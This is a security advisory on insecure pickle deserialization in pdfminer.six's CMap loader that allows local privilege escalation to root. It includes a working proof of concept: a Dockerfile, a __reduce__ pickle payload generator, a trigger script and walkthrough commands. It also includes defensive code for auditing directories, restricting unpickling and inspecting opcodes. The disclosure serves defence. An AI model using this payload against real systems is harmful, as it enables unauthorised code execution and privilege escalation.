GHSA-f83h-ghpp-7wcc: Insecure Deserialization (pickle) in pdfminer.six CMap Loader — Local Privesc

Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python’s pickle module for CMap file loading.
It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

Table of Contents

Background
Vulnerability Description
Demo Scenario
Technical Details
Setup and Usage
Step-by-step Walkthrough
Security Standards & References

Background

pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python’s pickle module.

Security Issue:
If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.
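A deployment can be audited for this condition by checking the ownership and permission bits of the directory the loader is pointed at. The following is a minimal sketch, not part of pdfminer.six: the helper name `risky_cmap_dirs` is hypothetical, and it assumes `CMAP_PATH` names a single directory and that only root and the current user are trusted owners.

```python
import os
import stat


def risky_cmap_dirs(directories):
    """Return directories that someone other than root or the current user can write to."""
    risky = []
    trusted_owners = {0, os.getuid()}  # assumption: only root and the caller are trusted
    for directory in directories:
        try:
            info = os.stat(directory)
        except OSError:
            # Missing or unreadable paths cannot be audited here; skip them.
            continue
        if not stat.S_ISDIR(info.st_mode):
            continue
        writable_by_others = info.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if writable_by_others or info.st_uid not in trusted_owners:
            risky.append(directory)
    return risky


if __name__ == "__main__":
    # Assumption: CMAP_PATH holds one directory; adjust if your setup differs.
    cmap_path = os.environ.get("CMAP_PATH")
    if cmap_path:
        for directory in risky_cmap_dirs([cmap_path]):
            print(f"untrusted writers possible: {directory}")
```

In the demo environment described below, /tmp/uploads would be reported both because it is owned by user1 and because its mode is 777.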

Vulnerability Description

Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.
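The reason pickle is unsafe for untrusted input is that a pickle stream can name any importable callable and have it invoked during loading. The harmless sketch below illustrates this with the built-in `print`; the class name `Demo` and the message are illustrative only.

```python
import pickle


class Demo:
    def __reduce__(self):
        # Tells pickle: "to rebuild this object, call print(...) with this argument".
        return (print, ("side effect during loads",))


blob = pickle.dumps(Demo())   # serializing does not call print()
result = pickle.loads(blob)   # deserializing does: the message is printed here

# The "object" that comes back is whatever the callable returned, not a Demo.
print(result is None)
```

Swapping `print` for a function that writes files or spawns a process is all an attacker needs, which is what the proof of concept in this report does.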

Demo Scenario

Environment:

Alpine Linux (Docker container)
Two users:
- user1 (attacker: low-privilege)
- root (victim: runs privileged PDF-processing script)
Shared writable directory: /tmp/uploads
CMAP_PATH set to /tmp/uploads for the privileged script
pdfminer.six installed system-wide

Attack Flow:

user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads.
The privileged service (root) processes a PDF or calls get_cmap("Evil").
The malicious pickle is deserialized, running arbitrary code as root.
The exploit creates a flag file in /root/pwnedByPdfminer as proof.

Technical Details

Vulnerability Type: Insecure deserialization of untrusted data using Python’s pickle
Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH

Vulnerable Line:

return type(str(name), (), pickle.loads(gzfile.read()))

In pdfminer/cmapdb.py's _load_data method

https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
Proof of Concept: See createEvilPickle.py, evilmod.py, and processPDF.py

Exploit Chain:

Attacker places a malicious .pickle.gz file in the CMap search path.
Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.
Arbitrary code executes with the privilege of the process (root/service account).
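One general way to break this chain is to refuse to resolve any global while unpickling, following the "restricting globals" pattern from the Python documentation. The sketch below is an illustration under assumptions, not the project's fix: the names `DataOnlyUnpickler` and `loads_data_only` are hypothetical, and it assumes legitimate CMap pickles contain only plain containers and scalars.

```python
import io
import pickle


class DataOnlyUnpickler(pickle.Unpickler):
    """Unpickler that refuses to import any class or function."""

    def find_class(self, module, name):
        # Every attempt to reference a global ends here instead of importing it.
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def loads_data_only(data: bytes):
    """Deserialize plain data (dicts, lists, strings, numbers) and nothing else."""
    return DataOnlyUnpickler(io.BytesIO(data)).load()
```

A payload built with `__reduce__` fails with `pickle.UnpicklingError` before its callable runs, while a plain dictionary such as `{"CODE2CID": {}, "IS_VERTICAL": False}` still loads. Replacing pickle with a data-only format such as JSON avoids the problem more thoroughly.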

Setup and Usage

📁 Files

</> Dockerfile

FROM python:3.11-alpine

# Create the low-privileged user and the shared upload directory
RUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads

WORKDIR /app

# Install pdfminer.six
RUN pip install --no-cache-dir pdfminer.six

# Copy app files
COPY evilmod.py /app/evilmod.py
COPY createEvilPickle.py /app/createEvilPickle.py
COPY processPDF.py /app/processPDF.py

# Set up permissions for demo
RUN chmod 777 /tmp/uploads

# Default: drop into a shell for demo instructions
CMD ["/bin/sh"]

</> evilmod.py

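def evilFunc():
    # Runs inside the victim process when the pickle is loaded.
    with open("/root/pwnedByPdfminer", "w") as f:
        f.write("ROOTED by pdfminer pickle RCE\n")
    # Return a dict so the loader's type(name, (), {...}) call still succeeds.
    return {"CODE2CID": {}, "IS_VERTICAL": False}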

</> createEvilPickle.py

import pickle
import gzip
from evilmod import evilFunc

class Evil:
    def __reduce__(self):
        return (evilFunc, ())

payload = pickle.dumps(Evil())
with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f:
    f.write(payload)

print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz")

</> processPDF.py

import os
from pdfminer.cmapdb import CMapDB

os.environ["CMAP_PATH"] = "/tmp/uploads"

CMapDB.get_cmap("Evil")

print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.")

Build and start the demo container

docker build -t pdfminer-priv-esc-demo .
docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo

In the container, open two shells in parallel (for example, with docker exec -it pdfminer-demo /bin/sh from the host) or switch users in one:

Shell 1 (Attacker: user1)

su user1
cd /app
python createEvilPickle.py
# Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1

Shell 2 (Victim: root)

cd /app
python processPDF.py
# Output: If vulnerable, /root/pwnedByPdfminer will be created

Proof of escalation

cat /root/pwnedByPdfminer
# 🏴 Output: ROOTED by pdfminer pickle RCE

Step-by-step Walkthrough

user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
The root user runs a typical PDF-processing script, which loads CMap files from that directory.
The exploit triggers, running arbitrary code as root.
The attacker now has proof of code execution as root (and, in a real attack, could escalate further).
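The planted file can also be examined without triggering it, because `pickletools.genops` only parses the opcode stream and never executes it. The sketch below is one possible triage helper; the function names and the choice of opcodes treated as suspicious are assumptions, not an exhaustive detection rule.

```python
import gzip
import pickletools

# Opcodes that import objects or call them during loading.
SUSPICIOUS = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST",
    "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def suspicious_opcodes(data: bytes):
    """List import/call opcodes found in a pickle stream, without running it."""
    seen = {opcode.name for opcode, _arg, _pos in pickletools.genops(data)}
    return sorted(seen & SUSPICIOUS)


def inspect_gz(path):
    """Decompress a .pickle.gz file and report its suspicious opcodes."""
    with gzip.open(path, "rb") as handle:
        return suspicious_opcodes(handle.read())
```

Calling `inspect_gz("/tmp/uploads/Evil.pickle.gz")` on the demo payload should report a `REDUCE` opcode, whereas a pickle holding only dictionaries, strings, and numbers yields an empty list.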

Security Standards & References

OWASP Top 10:
- A08:2021 - Software and Data Integrity Failures
- A03:2021 - Injection (by analogy, as it’s code injection via deserialization)
MITRE ATT&CK Techniques:
- T1055: Process Injection
- T1548: Abuse Elevation Control Mechanism
